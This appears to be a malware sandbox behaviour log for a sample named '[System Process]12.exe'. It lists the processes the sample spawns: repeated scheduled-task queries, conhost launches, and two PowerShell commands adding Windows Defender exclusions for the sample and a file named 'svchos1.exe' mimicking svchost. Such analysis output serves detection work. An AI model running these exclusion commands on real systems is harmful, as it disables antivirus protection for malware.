Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\[System Process]12.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process created: unknown unknown	Jump to behavior
